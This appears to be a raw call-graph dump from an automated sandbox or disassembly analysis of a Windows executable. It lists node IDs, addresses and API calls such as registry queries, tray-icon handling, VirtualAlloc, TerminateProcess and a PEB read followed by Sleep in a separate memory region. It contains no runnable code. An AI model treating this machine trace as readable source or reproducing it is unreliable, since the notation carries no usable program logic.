96948->96950 96950->96948 96953 da2e7a 96951->96953 96952 d350f5 40 API calls 96952->96953 96953->96952 96954 da28fe 27 API calls 96953->96954 96955 da2d3b 96953->96955 96956 d3511f 64 API calls 96953->96956 96954->96953 96955->96553 96955->96554 96956->96953 96958 da22e7 96957->96958 96959 da22d9 96957->96959 96961 da232c 96958->96961 96962 d5e5eb 29 API calls 96958->96962 96963 da22f0 96958->96963 96960 d5e5eb 29 API calls 96959->96960 96960->96958 96986 da2557 96961->96986 96964 da2311 96962->96964 96963->96553 96964->96961 96966 da231a 96964->96966 96966->96963 96970 d5e678 67 API calls 96966->96970 96967 da2370 96968 da2374 96967->96968 96969 da2395 96967->96969 96972 da2381 96968->96972 96974 d5e678 67 API calls 96968->96974 96990 da2171 96969->96990 96970->96963 96972->96963 96975 d5e678 67 API calls 96972->96975 96973 da239d 96976 da23c3 96973->96976 96977 da23a3 96973->96977 96974->96972 96975->96963 96997 da23f3 96976->96997 96979 da23b0 96977->96979 96980 d5e678 67 API calls 96977->96980 96979->96963 96981 d5e678 67 API calls 96979->96981 96980->96979 96981->96963 96982 da23de 96982->96963 96985 d5e678 67 API calls 96982->96985 96983 da23ca 96983->96982 97005 d5e678 96983->97005 96985->96963 96987 da257c 96986->96987 96989 da2565 __fread_nolock 96986->96989 96988 d5e8c4 __fread_nolock 40 API calls 96987->96988 96988->96989 96989->96967 96991 d5ea0c ___std_exception_copy 21 API calls 96990->96991 96992 da217f 96991->96992 96993 d5ea0c ___std_exception_copy 21 API calls 96992->96993 96994 da2190 96993->96994 96995 d5ea0c ___std_exception_copy 21 API calls 96994->96995 96996 da219c 96995->96996 96996->96973 96998 da2408 96997->96998 96999 da24c0 96998->96999 97001 da21cc 40 API calls 96998->97001 97004 da24c7 96998->97004 97018 da2606 96998->97018 97026 da2269 40 API calls 96998->97026 97022 da2724 96999->97022 97001->96998 97004->96983 97006 d5e684 BuildCatchObjectHelperInternal 97005->97006 97007 d5e695 97006->97007 97008 d5e6aa 97006->97008 97100 d5f2d9 20 API calls _abort 97007->97100 97017 d5e6a5 __wsopen_s 97008->97017 97083 d5918d EnterCriticalSection 97008->97083 97010 d5e69a 97101 d627ec 26 API calls __wsopen_s 97010->97101 97013 d5e6c6 97084 d5e602 97013->97084 97015 d5e6d1 97102 d5e6ee LeaveCriticalSection __fread_nolock 97015->97102 97017->96982 97019 da2617 97018->97019 97020 da261d 97018->97020 97019->97020 97027 da26d7 97019->97027 97020->96998 97023 da2742 97022->97023 97024 da2731 97022->97024 97023->97004 97025 d5dbb3 65 API calls 97024->97025 97025->97023 97026->96998 97028 da2714 97027->97028 97029 da2703 97027->97029 97028->97019 97031 d5dbb3 97029->97031 97032 d5dbc1 97031->97032 97033 d5dbdd 97031->97033 97032->97033 97034 d5dbe3 97032->97034 97035 d5dbcd 97032->97035 97033->97028 97040 d5d9cc 97034->97040 97043 d5f2d9 20 API calls _abort 97035->97043 97038 d5dbd2 97044 d627ec 26 API calls __wsopen_s 97038->97044 97045 d5d97b 97040->97045 97043->97038 97044->97033 97046 d5d987 BuildCatchObjectHelperInternal 97045->97046 97053 d5918d EnterCriticalSection 97046->97053 97048 d5d995 97054 d5d9f4 97048->97054 97053->97048 97062 d649a1 97054->97062 97063 d5d955 __fread_nolock 26 API calls 97062->97063 97064 d649b0 97063->97064 97083->97013 97085 d5e624 97084->97085 97086 d5e60f 97084->97086 97098 d5e61f 97085->97098 97103 d5dc0b 97085->97103 97128 d5f2d9 20 API calls _abort 97086->97128 97089 d5e614 97129 d627ec 26 API calls __wsopen_s 97089->97129 97094 d5d955 __fread_nolock 26 API calls 97095 d5e646 97094->97095 97113 d6862f 97095->97113 97098->97015 97100->97010 97101->97017 97102->97017 97104 d5dc23 97103->97104 97108 d5dc1f 97103->97108 97105 d5d955 __fread_nolock 26 API calls 97104->97105 97104->97108 97106 d5dc43 97105->97106 97130 d659be 97106->97130 97109 d64d7a 97108->97109 97110 d5e640 97109->97110 97111 d64d90 97109->97111 97110->97094 97111->97110 97112 d629c8 _free 20 API calls 97111->97112 97112->97110 97128->97089 97129->97098 97131 d659ca BuildCatchObjectHelperInternal 97130->97131 97132 d659d2 97131->97132 97133 d659ea 97131->97133 97307 d33156 97310 d33170 97307->97310 97311 d33187 97310->97311 97312 d331eb 97311->97312 97313 d3318c 97311->97313 97351 d331e9 97311->97351 97315 d331f1 97312->97315 97316 d72dfb 97312->97316 97317 d33265 PostQuitMessage 97313->97317 97318 d33199 97313->97318 97314 d331d0 DefWindowProcW 97344 d3316a 97314->97344 97319 d331f8 97315->97319 97320 d3321d SetTimer RegisterWindowMessageW 97315->97320 97366 d318e2 10 API calls 97316->97366 97317->97344 97322 d331a4 97318->97322 97323 d72e7c 97318->97323 97324 d33201 KillTimer 97319->97324 97325 d72d9c 97319->97325 97327 d33246 CreatePopupMenu 97320->97327 97320->97344 97328 d331ae 97322->97328 97329 d72e68 97322->97329 97380 d9bf30 34 API calls ___scrt_fastfail 97323->97380 97362 d330f2 Shell_NotifyIconW ___scrt_fastfail 97324->97362 97332 d72dd7 MoveWindow 97325->97332 97333 d72da1 97325->97333 97326 d72e1c 97367 d4e499 42 API calls 97326->97367 97327->97344 97337 d72e4d 97328->97337 97338 d331b9 97328->97338 97355 d9c161 97329->97355 97331 d72e8e 97331->97314 97331->97344 97332->97344 97341 d72da7 97333->97341 97342 d72dc6 SetFocus 97333->97342 97337->97314 97379 d90ad7 22 API calls 97337->97379 97339 d33253 97338->97339 97340 d331c4 97338->97340 97364 d3326f 44 API calls ___scrt_fastfail 97339->97364 97340->97314 97368 d330f2 Shell_NotifyIconW ___scrt_fastfail 97340->97368 97341->97340 97346 d72db0 97341->97346 97342->97344 97343 d33214 97363 d33c50 DeleteObject DestroyWindow 97343->97363 97365 d318e2 10 API calls 97346->97365 97349 d33263 97349->97344 97351->97314 97353 d72e41 97369 d33837 97353->97369 97356 d9c179 ___scrt_fastfail 97355->97356 97357 d9c276 97355->97357 97381 d33923 97356->97381 97357->97344 97359 d9c25f KillTimer SetTimer 97359->97357 97360 d9c1a0 97360->97359 97361 d9c251 Shell_NotifyIconW 97360->97361 97361->97359 97362->97343 97363->97344 97364->97349 97365->97344 97366->97326 97367->97340 97368->97353 97370 d33862 ___scrt_fastfail 97369->97370 97452 d34212 97370->97452 97373 d338e8 97375 d73386 Shell_NotifyIconW 97373->97375 97376 d33906 Shell_NotifyIconW 97373->97376 97377 d33923 24 API calls 97376->97377 97378 d3391c 97377->97378 97378->97351 97379->97351 97380->97331 97382 d33a13 97381->97382 97383 d3393f 97381->97383 97382->97360 97403 d36270 97383->97403 97386 d73393 LoadStringW 97389 d733ad 97386->97389 97387 d3395a 97388 d36b57 22 API calls 97387->97388 97390 d3396f 97388->97390 97395 d3a8c7 22 API calls 97389->97395 97397 d33994 ___scrt_fastfail 97389->97397 97391 d733c9 97390->97391 97392 d3397c 97390->97392 97394 d36350 22 API calls 97391->97394 97392->97389 97393 d33986 97392->97393 97408 d36350 97393->97408 97398 d733d7 97394->97398 97395->97397 97400 d339f9 Shell_NotifyIconW 97397->97400 97398->97397 97417 d333c6 97398->97417 97400->97382 97401 d733f9 97402 d333c6 22 API calls 97401->97402 97402->97397 97404 d4fe0b 22 API calls 97403->97404 97405 d36295 97404->97405 97406 d4fddb 22 API calls 97405->97406 97407 d3394d 97406->97407 97407->97386 97407->97387 97409 d36362 97408->97409 97410 d74a51 97408->97410 97426 d36373 97409->97426 97436 d34a88 22 API calls __fread_nolock 97410->97436 97413 d74a5b 97415 d74a67 97413->97415 97416 d3a8c7 22 API calls 97413->97416 97414 d3636e 97414->97397 97416->97415 97418 d730bb 97417->97418 97419 d333dd 97417->97419 97421 d4fddb 22 API calls 97418->97421 97442 d333ee 97419->97442 97423 d730c5 _wcslen 97421->97423 97422 d333e8 97422->97401 97424 d4fe0b 22 API calls 97423->97424 97425 d730fe __fread_nolock 97424->97425 97427 d36382 97426->97427 97433 d363b6 __fread_nolock 97426->97433 97428 d74a82 97427->97428 97429 d363a9 97427->97429 97427->97433 97430 d4fddb 22 API calls 97428->97430 97437 d3a587 97429->97437 97432 d74a91 97430->97432 97434 d4fe0b 22 API calls 97432->97434 97433->97414 97435 d74ac5 __fread_nolock 97434->97435 97436->97413 97438 d3a59d 97437->97438 97441 d3a598 __fread_nolock 97437->97441 97439 d7f80f 97438->97439 97440 d4fe0b 22 API calls 97438->97440 97440->97441 97441->97433 97443 d333fe _wcslen 97442->97443 97444 d33411 97443->97444 97445 d7311d 97443->97445 97446 d3a587 22 API calls 97444->97446 97447 d4fddb 22 API calls 97445->97447 97448 d3341e __fread_nolock 97446->97448 97449 d73127 97447->97449 97448->97422 97450 d4fe0b 22 API calls 97449->97450 97451 d73157 __fread_nolock 97450->97451 97453 d735a4 97452->97453 97454 d338b7 97452->97454 97453->97454 97455 d735ad DestroyIcon 97453->97455 97454->97373 97456 d9c874 42 API calls _strftime 97454->97456 97455->97454 97456->97373 97457 d3105b 97462 d3344d 97457->97462 97459 d3106a 97493 d500a3 29 API calls __onexit 97459->97493 97461 d31074 97463 d3345d __wsopen_s 97462->97463 97464 d3a961 22 API calls 97463->97464 97465 d33513 97464->97465 97466 d33a5a 24 API calls 97465->97466 97467 d3351c 97466->97467 97494 d33357 97467->97494 97470 d333c6 22 API calls 97471 d33535 97470->97471 97472 d3515f 22 API calls 97471->97472 97473 d33544 97472->97473 97474 d3a961 22 API calls 97473->97474 97475 d3354d 97474->97475 97476 d3a6c3 22 API calls 97475->97476 97477 d33556 RegOpenKeyExW 97476->97477 97478 d73176 RegQueryValueExW 97477->97478 97482 d33578 97477->97482 97479 d73193 97478->97479 97480 d7320c RegCloseKey 97478->97480 97481 d4fe0b 22 API calls 97479->97481 97480->97482 97490 d7321e _wcslen 97480->97490 97483 d731ac 97481->97483 97482->97459 97484 d35722 22 API calls 97483->97484 97485 d731b7 RegQueryValueExW 97484->97485 97487 d731d4 97485->97487 97489 d731ee ISource 97485->97489 97486 d34c6d 22 API calls 97486->97490 97488 d36b57 22 API calls 97487->97488 97488->97489 97489->97480 97490->97482 97490->97486 97491 d39cb3 22 API calls 97490->97491 97492 d3515f 22 API calls 97490->97492 97491->97490 97492->97490 97493->97461 97495 d71f50 __wsopen_s 97494->97495 97496 d33364 GetFullPathNameW 97495->97496 97497 d33386 97496->97497 97498 d36b57 22 API calls 97497->97498 97499 d333a4 97498->97499 97499->97470 97500 3bb23b0 97514 3bb0000 97500->97514 97502 3bb2446 97517 3bb22a0 97502->97517 97520 3bb3470 GetPEB 97514->97520 97516 3bb068b 97516->97502 97518 3bb22a9 Sleep 97517->97518 97519 3bb22b7 97518->97519 97521 3bb349a 97520->97521 97521->97516 97522 d31098 97527 d342de 97522->97527 97526 d310a7 97528 d3a961 22 API calls 97527->97528 97529 d342f5 GetVersionExW 97528->97529 97530 d36b57 22 API calls 97529->97530 97531 d34342 97530->97531 97532 d393b2 22 API calls 97531->97532 97541 d34378 97531->97541 97533 d3436c 97532->97533 97535 d337a0 22 API calls 97533->97535 97534 d3441b GetCurrentProcess IsWow64Process 97536 d34437 97534->97536 97535->97541 97537 d73824 GetSystemInfo 97536->97537 97538 d3444f LoadLibraryA 97536->97538 97539 d34460 GetProcAddress 97538->97539 97540 d3449c GetSystemInfo 97538->97540 97539->97540 97543 d34470 GetNativeSystemInfo 97539->97543 97544 d34476 97540->97544 97541->97534 97542 d737df 97541->97542 97543->97544 97545 d3109d 97544->97545 97546 d3447a FreeLibrary 97544->97546 97547 d500a3 29 API calls __onexit 97545->97547 97546->97545 97547->97526 97548 d690fa 97549 d69107 97548->97549 97553 d6911f 97548->97553 97598 d5f2d9 20 API calls _abort 97549->97598 97551 d6910c 97599 d627ec 26 API calls __wsopen_s 97551->97599 97554 d6917a 97553->97554 97562 d69117 97553->97562 97600 d6fdc4 21 API calls 2 library calls 97553->97600 97556 d5d955 __fread_nolock 26 API calls 97554->97556 97557 d69192 97556->97557 97568 d68c32 97557->97568 97559 d69199 97560 d5d955 __fread_nolock 26 API calls 97559->97560 97559->97562 97561 d691c5 97560->97561 97561->97562 97563 d5d955 __fread_nolock 26 API calls 97561->97563 97564 d691d3 97563->97564 97564->97562 97565 d5d955 __fread_nolock 26 API calls 97564->97565 97566 d691e3 97565->97566 97567 d5d955 __fread_nolock 26 API calls 97566->97567 97567->97562 97569 d68c3e BuildCatchObjectHelperInternal 97568->97569 97570 d68c46 97569->97570 97571 d68c5e 97569->97571 97602 d5f2c6 20 API calls _abort 97570->97602 97572 d68d24 97571->97572 97576 d68c97 97571->97576 97609 d5f2c6 20 API calls _abort 97572->97609 97575 d68c4b 97603 d5f2d9 20 API calls _abort 97575->97603 97580 d68ca6 97576->97580 97581 d68cbb 97576->97581 97577 d68d29 97610 d5f2d9 20 API calls _abort 97577->97610 97579 d68c53 __wsopen_s 97579->97559 97604 d5f2c6 20 API calls _abort 97580->97604 97601 d65147 EnterCriticalSection 97581->97601 97585 d68cb3 97611 d627ec 26 API calls __wsopen_s 97585->97611 97586 d68cab 97605 d5f2d9 20 API calls _abort 97586->97605 97587 d68cc1 97589 d68cf2 97587->97589 97590 d68cdd 97587->97590 97592 d68d45 __fread_nolock 38 API calls 97589->97592 97606 d5f2d9 20 API calls _abort 97590->97606 97596 d68ced 97592->97596 97594 d68ce2 97607 d5f2c6 20 API calls _abort 97594->97607 97608 d68d1c LeaveCriticalSection __wsopen_s 97596->97608 97598->97551 97599->97562 97600->97554 97601->97587 97602->97575 97603->97579 97604->97586 97605->97585 97606->97594 97607->97596 97608->97579 97609->97577 97610->97585 97611->97579 97612 d3f7bf 97613 d3f7d3 97612->97613 97614 d3fcb6 97612->97614 97616 d3fcc2 97613->97616 97617 d4fddb 22 API calls 97613->97617 97615 d3aceb 23 API calls 97614->97615 97615->97616 97618 d3aceb 23 API calls 97616->97618 97619 d3f7e5 97617->97619 97621 d3fd3d 97618->97621 97619->97616 97620 d3f83e 97619->97620 97619->97621 97638 d3ed9d ISource 97620->97638 97647 d41310 97620->97647 97706 da1155 22 API calls 97621->97706 97624 d3fef7 97630 d3a8c7 22 API calls 97624->97630 97624->97638 97627 d84b0b 97708 da359c 82 API calls __wsopen_s 97627->97708 97628 d84600 97635 d3a8c7 22 API calls 97628->97635 97628->97638 97630->97638 97633 d50242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97644 d3ec76 ISource 97633->97644 97634 d3a8c7 22 API calls 97634->97644 97635->97638 97636 d3fbe3 97636->97638 97639 d84bdc 97636->97639 97645 d3f3ae ISource 97636->97645 97637 d3a961 22 API calls 97637->97644 97709 da359c 82 API calls __wsopen_s 97639->97709 97641 d84beb 97710 da359c 82 API calls __wsopen_s 97641->97710 97642 d500a3 29 API calls pre_c_initialization 97642->97644 97643 d4fddb 22 API calls 97643->97644 97644->97624 97644->97627 97644->97628 97644->97633 97644->97634 97644->97636 97644->97637 97644->97638 97644->97641 97644->97642 97644->97643 97644->97645 97646 d501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97644->97646 97704 d401e0 236 API calls 2 library calls 97644->97704 97705 d406a0 41 API calls ISource 97644->97705 97645->97638 97707 da359c 82 API calls __wsopen_s 97645->97707 97646->97644 97648 d41376 97647->97648 97649 d417b0 97647->97649 97650 d41390 97648->97650 97651 d86331 97648->97651 97826 d50242 5 API calls __Init_thread_wait 97649->97826 97711 d41940 97650->97711 97654 d8633d 97651->97654 97830 db709c 236 API calls 97651->97830 97654->97644 97656 d417ba 97658 d417fb 97656->97658 97660 d39cb3 22 API calls 97656->97660 97662 d86346 97658->97662 97664 d4182c 97658->97664 97659 d41940 9 API calls 97661 d413b6 97659->97661 97667 d417d4 97660->97667 97661->97658 97663 d413ec 97661->97663 97831 da359c 82 API calls __wsopen_s 97662->97831 97663->97662 97688 d41408 __fread_nolock 97663->97688 97666 d3aceb 23 API calls 97664->97666 97669 d41839 97666->97669 97827 d501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97667->97827 97668 d86369 97668->97644 97828 d4d217 236 API calls 97669->97828 97672 d8636e 97832 da359c 82 API calls __wsopen_s 97672->97832 97673 d4152f 97675 d4153c 97673->97675 97676 d863d1 97673->97676 97678 d41940 9 API calls 97675->97678 97834 db5745 54 API calls _wcslen 97676->97834 97679 d41549 97678->97679 97683 d864fa 97679->97683 97685 d41940 9 API calls 97679->97685 97680 d4fddb 22 API calls 97680->97688 97681 d41872 97829 d4faeb 23 API calls 97681->97829 97682 d4fe0b 22 API calls 97682->97688 97683->97668 97835 da359c 82 API calls __wsopen_s 97683->97835 97690 d41563 97685->97690 97687 d3ec40 236 API calls 97687->97688 97688->97668 97688->97669 97688->97672 97688->97673 97688->97680 97688->97682 97688->97687 97689 d863b2 97688->97689 97833 da359c 82 API calls __wsopen_s 97689->97833 97690->97683 97692 d3a8c7 22 API calls 97690->97692 97694 d415c7 ISource 97690->97694 97692->97694 97693 d41940 9 API calls 97693->97694 97694->97668 97694->97681 97694->97683 97694->97693 97697 d4167b ISource 97694->97697 97721 db9abb 97694->97721 97727 d9d4ce 97694->97727 97730 db958b 97694->97730 97733 daf0ec 97694->97733 97742 db959f 97694->97742 97745 da6ef1 97694->97745 97695 d4171d 97695->97644 97697->97695 97825 d4ce17 22 API calls ISource 97697->97825 97704->97644 97705->97644 97706->97638 97707->97638 97708->97638 97709->97641 97710->97638 97712 d41981 97711->97712 97713 d4195d 97711->97713 97836 d50242 5 API calls __Init_thread_wait 97712->97836 97720 d413a0 97713->97720 97838 d50242 5 API calls __Init_thread_wait 97713->97838 97715 d4198b 97715->97713 97837 d501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97715->97837 97717 d48727 97717->97720 97839 d501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97717->97839 97720->97659 97840 d37510 97721->97840 97724 db9af4 97725 db9ae5 97724->97725 97863 d9417d 97724->97863 97725->97694 97873 d9dbbe lstrlenW 97727->97873 97878 db7f59 97730->97878 97732 db959b 97732->97694 97734 d37510 53 API calls 97733->97734 97735 daf126 97734->97735 97990 d39e90 97735->97990 97737 daf136 97738 daf15b 97737->97738 97739 d3ec40 236 API calls 97737->97739 97741 daf15f 97738->97741 98018 d39c6e 22 API calls 97738->98018 97739->97738 97741->97694 97743 db7f59 120 API calls 97742->97743 97744 db95af 97743->97744 97744->97694 97746 d3a961 22 API calls 97745->97746 97747 da6f1d 97746->97747 97748 d3a961 22 API calls 97747->97748 97749 da6f26 97748->97749 97750 da6f3a 97749->97750 98185 d3b567 39 API calls 97749->98185 97752 d37510 53 API calls 97750->97752 97759 da6f57 _wcslen 97752->97759 97753 da70bf 97756 d34ecb 94 API calls 97753->97756 97754 da6fbc 97755 d37510 53 API calls 97754->97755 97757 da6fc8 97755->97757 97758 da70d0 97756->97758 97762 d3a8c7 22 API calls 97757->97762 97767 da6fdb 97757->97767 97760 da70e5 97758->97760 97763 d34ecb 94 API calls 97758->97763 97759->97753 97759->97754 97765 da70e9 97759->97765 97761 d3a961 22 API calls 97760->97761 97760->97765 97764 da711a 97761->97764 97762->97767 97763->97760 97766 d3a961 22 API calls 97764->97766 97765->97694 97770 da7126 97766->97770 97768 da7027 97767->97768 97771 da7005 97767->97771 97774 d3a8c7 22 API calls 97767->97774 97769 d37510 53 API calls 97768->97769 97772 da7034 97769->97772 97773 d3a961 22 API calls 97770->97773 97775 d333c6 22 API calls 97771->97775 97776 da703d 97772->97776 97777 da7047 97772->97777 97778 da712f 97773->97778 97774->97771 97779 da700f 97775->97779 97780 d3a8c7 22 API calls 97776->97780 98186 d9e199 GetFileAttributesW 97777->98186 97782 d3a961 22 API calls 97778->97782 97783 d37510 53 API calls 97779->97783 97780->97777 97786 da7138 97782->97786 97784 da701b 97783->97784 97787 d36350 22 API calls 97784->97787 97785 da7050 97788 da7063 97785->97788 97791 d34c6d 22 API calls 97785->97791 97789 d37510 53 API calls 97786->97789 97787->97768 97790 d37510 53 API calls 97788->97790 97797 da7069 97788->97797 97792 da7145 97789->97792 97793 da70a0 97790->97793 97791->97788 98034 d3525f 97792->98034 98187 d9d076 57 API calls 97793->98187 97796 da7166 97798 d34c6d 22 API calls 97796->97798 97797->97765 97799 da7175 97798->97799 97800 da71a9 97799->97800 97801 d34c6d 22 API calls 97799->97801 97802 d3a8c7 22 API calls 97800->97802 97803 da7186 97801->97803 97804 da71ba 97802->97804 97803->97800 97806 d36b57 22 API calls 97803->97806 97805 d36350 22 API calls 97804->97805 97807 da71c8 97805->97807 97808 da719b 97806->97808 97809 d36350 22 API calls 97807->97809 97810 d36b57 22 API calls 97808->97810 97811 da71d6 97809->97811 97810->97800 97812 d36350 22 API calls 97811->97812 97813 da71e4 97812->97813 97814 d37510 53 API calls 97813->97814 97815 da71f0 97814->97815 98076 d9d7bc 97815->98076 97817 da7201 97818 d9d4ce 4 API calls 97817->97818 97819 da720b 97818->97819 97820 d37510 53 API calls 97819->97820 97824 da7239 97819->97824 97821 da7229 97820->97821 98130 da2947 97821->98130 97823 d34f39 68 API calls 97823->97765 97824->97823 97825->97697 97826->97656 97827->97658 97828->97681 97829->97681 97830->97654 97831->97668 97832->97668 97833->97668 97834->97690 97835->97668 97836->97715 97837->97713 97838->97717 97839->97720 97841 d37525 97840->97841 97857 d37522 LoadLibraryW 97840->97857 97842 d3755b 97841->97842 97843 d3752d 97841->97843 97846 d3756d 97842->97846 97852 d750f6 97842->97852 97854 d7500f 97842->97854 97869 d551c6 26 API calls 97843->97869 97870 d4fb21 51 API calls 97846->97870 97847 d3753d 97851 d4fddb 22 API calls 97847->97851 97848 d7510e 97848->97848 97853 d37547 97851->97853 97872 d55183 26 API calls 97852->97872 97855 d39cb3 22 API calls 97853->97855 97856 d4fe0b 22 API calls 97854->97856 97862 d75088 97854->97862 97855->97857 97858 d75058 97856->97858 97857->97724 97857->97725 97859 d4fddb 22 API calls 97858->97859 97860 d7507f 97859->97860 97861 d39cb3 22 API calls 97860->97861 97861->97862 97871 d4fb21 51 API calls 97862->97871 97864 d9418f 97863->97864 97868 d941b0 __fread_nolock 97863->97868 97866 d4fe0b 22 API calls 97864->97866 97865 d4fddb 22 API calls 97867 d941e2 97865->97867 97866->97868 97867->97725 97868->97865 97869->97847 97870->97847 97871->97852 97872->97848 97874 d9dbdc GetFileAttributesW 97873->97874 97875 d9d4d5 97873->97875 97874->97875 97876 d9dbe8 FindFirstFileW 97874->97876 97875->97694 97876->97875 97877 d9dbf9 FindClose 97876->97877 97877->97875 97879 d37510 53 API calls 97878->97879 97880 db7f90 97879->97880 97901 db7fd5 ISource 97880->97901 97916 db8cd3 97880->97916 97882 db8281 97883 db844f 97882->97883 97888 db828f 97882->97888 97962 db8ee4 60 API calls 97883->97962 97885 d9417d 22 API calls 97907 db8049 97885->97907 97886 db845e 97887 db846a 97886->97887 97886->97888 97887->97901 97929 db7e86 97888->97929 97889 d37510 53 API calls 97889->97907 97894 db82c8 97944 d4fc70 97894->97944 97897 db82e8 97960 da359c 82 API calls __wsopen_s 97897->97960 97898 db8302 97900 d363eb 22 API calls 97898->97900 97903 db8311 97900->97903 97901->97732 97902 db82f3 GetCurrentProcess TerminateProcess 97902->97898 97904 d36a50 22 API calls 97903->97904 97905 db832a 97904->97905 97914 db8352 97905->97914 97948 d404f0 97905->97948 97907->97882 97907->97885 97907->97889 97907->97901 97959 db851d 42 API calls _strftime 97907->97959 97908 db84c5 97908->97901 97910 db84d9 FreeLibrary 97908->97910 97909 db8341 97961 db8b7b 75 API calls 97909->97961 97910->97901 97912 d404f0 22 API calls 97912->97914 97914->97908 97914->97912 97915 d3aceb 23 API calls 97914->97915 97963 db8b7b 75 API calls 97914->97963 97915->97914 97917 d3aec9 22 API calls 97916->97917 97918 db8cee CharLowerBuffW 97917->97918 97964 d98e54 97918->97964 97922 d3a961 22 API calls 97923 db8d2a 97922->97923 97971 d36d25 97923->97971 97925 db8d3e 97926 d393b2 22 API calls 97925->97926 97928 db8d48 _wcslen 97926->97928 97927 db8e5e _wcslen 97927->97907 97928->97927 97984 db851d 42 API calls _strftime 97928->97984 97930 db7eec 97929->97930 97931 db7ea1 97929->97931 97935 db9096 97930->97935 97932 d4fe0b 22 API calls 97931->97932 97933 db7ec3 97932->97933 97933->97930 97934 d4fddb 22 API calls 97933->97934 97934->97933 97936 db92ab ISource 97935->97936 97943 db90ba _strcat _wcslen 97935->97943 97936->97894 97937 d3b6b5 39 API calls 97937->97943 97938 d3b567 39 API calls 97938->97943 97939 d3b38f 39 API calls 97939->97943 97940 d37510 53 API calls 97940->97943 97941 d5ea0c 21 API calls ___std_exception_copy 97941->97943 97943->97936 97943->97937 97943->97938 97943->97939 97943->97940 97943->97941 97988 d9efae 24 API calls _wcslen 97943->97988 97946 d4fc85 97944->97946 97945 d4fd1d VirtualAlloc 97947 d4fceb 97945->97947 97946->97945 97946->97947 97947->97897 97947->97898 97949 d40502 97948->97949 97953 d4050b 97949->97953 97989 d4a732 22 API calls 97949->97989 97951 d405c0 97951->97909 97952 d4fddb 22 API calls 97954 d40629 97952->97954 97953->97951 97953->97952 97955 d4fddb 22 API calls 97954->97955 97956 d40632 97955->97956 97957 d39cb3 22 API calls 97956->97957 97958 d40641 97957->97958 97958->97909 97959->97907 97960->97902 97961->97914 97962->97886 97963->97914 97965 d98e74 _wcslen 97964->97965 97966 d98f63 97965->97966 97968 d98ea9 97965->97968 97970 d98f68 97965->97970 97966->97922 97966->97928 97968->97966 97985 d4ce60 41 API calls 97968->97985 97970->97966 97986 d4ce60 41 API calls 97970->97986 97972 d36d91 97971->97972 97973 d36d34 97971->97973 97974 d393b2 22 API calls 97972->97974 97973->97972 97975 d36d3f 97973->97975 97980 d36d62 __fread_nolock 97974->97980 97976 d36d5a 97975->97976 97977 d74c9d 97975->97977 97987 d36f34 22 API calls 97976->97987 97979 d4fddb 22 API calls 97977->97979 97981 d74ca7 97979->97981 97980->97925 97982 d4fe0b 22 API calls 97981->97982 97983 d74cda 97982->97983 97984->97927 97985->97968 97986->97970 97987->97980 97988->97943 97989->97953 97991 d36270 22 API calls 97990->97991 98012 d39eb5 97991->98012 97992 d39fd2 98020 d3a4a1 97992->98020 97994 d39fec 97994->97737 97997 d3a6c3 22 API calls 97997->98012 97998 d7f7c4 98032 d996e2 84 API calls __wsopen_s 97998->98032 97999 d7f699 98004 d4fddb 22 API calls 97999->98004 98001 d3a405 98001->97994 98033 d996e2 84 API calls __wsopen_s 98001->98033 98006 d7f754 98004->98006 98005 d7f7d2 98007 d3a4a1 22 API calls 98005->98007 98009 d4fe0b 22 API calls 98006->98009 98008 d7f7e8 98007->98008 98008->97994 98011 d3a12c __fread_nolock 98009->98011 98011->97998 98011->98001 98012->97992 98012->97997 98012->97998 98012->97999 98012->98001 98012->98011 98013 d3a587 22 API calls 98012->98013 98014 d3aec9 22 API calls 98012->98014 98017 d3a4a1 22 API calls 98012->98017 98019 d34573 41 API calls _wcslen 98012->98019 98029 d348c8 23 API calls 98012->98029 98030 d349bd 22 API calls __fread_nolock 98012->98030 98031 d3a673 22 API calls 98012->98031 98013->98012 98015 d3a0db CharUpperBuffW 98014->98015 98028 d3a673 22 API calls 98015->98028 98017->98012 98018->97741 98019->98012 98021 d3a52b 98020->98021 98027 d3a4b1 __fread_nolock 98020->98027 98023 d4fe0b 22 API calls 98021->98023 98022 d4fddb 22 API calls 98024 d3a4b8 98022->98024 98023->98027 98025 d3a4d6 98024->98025 98026 d4fddb 22 API calls 98024->98026 98025->97994 98026->98025 98027->98022 98028->98012 98029->98012 98030->98012 98031->98012 98032->98005 98033->97994 98035 d3a961 22 API calls 98034->98035 98036 d35275 98035->98036 98037 d3a961 22 API calls 98036->98037 98038 d3527d 98037->98038 98039 d3a961 22 API calls 98038->98039 98040 d35285 98039->98040 98041 d3a961 22 API calls 98040->98041 98042 d3528d 98041->98042 98043 d73df5 98042->98043 98044 d352c1 98042->98044 98045 d3a8c7 22 API calls 98043->98045 98046 d36d25 22 API calls 98044->98046 98047 d73dfe 98045->98047 98048 d352cf 98046->98048 98049 d3a6c3 22 API calls 98047->98049 98050 d393b2 22 API calls 98048->98050 98052 d35304 98049->98052 98051 d352d9 98050->98051 98051->98052 98053 d36d25 22 API calls 98051->98053 98058 d35325 98052->98058 98069 d35349 98052->98069 98071 d73e20 98052->98071 98055 d352fa 98053->98055 98054 d36d25 22 API calls 98056 d3535a 98054->98056 98057 d393b2 22 API calls 98055->98057 98059 d35370 98056->98059 98064 d3a8c7 22 API calls 98056->98064 98057->98052 98060 d34c6d 22 API calls 98058->98060 98058->98069 98061 d35384 98059->98061 98067 d3a8c7 22 API calls 98059->98067 98062 d35332 98060->98062 98065 d3538f 98061->98065 98068 d3a8c7 22 API calls 98061->98068 98066 d36d25 22 API calls 98062->98066 98062->98069 98063 d36b57 22 API calls 98073 d73ee0 98063->98073 98064->98059 98070 d3a8c7 22 API calls 98065->98070 98074 d3539a 98065->98074 98066->98069 98067->98061 98068->98065 98069->98054 98070->98074 98071->98063 98072 d34c6d 22 API calls 98072->98073 98073->98069 98073->98072 98188 d349bd 22 API calls __fread_nolock 98073->98188 98074->97796 98077 d9d7d8 98076->98077 98078 d9d7dd 98077->98078 98079 d9d7f3 98077->98079 98081 d3a8c7 22 API calls 98078->98081 98083 d9d7ee 98078->98083 98080 d3a961 22 API calls 98079->98080 98082 d9d7fb 98080->98082 98081->98083 98084 d3a961 22 API calls 98082->98084 98083->97817 98085 d9d803 98084->98085 98086 d3a961 22 API calls 98085->98086 98087 d9d80e 98086->98087 98088 d3a961 22 API calls 98087->98088 98089 d9d816 98088->98089 98090 d3a961 22 API calls 98089->98090 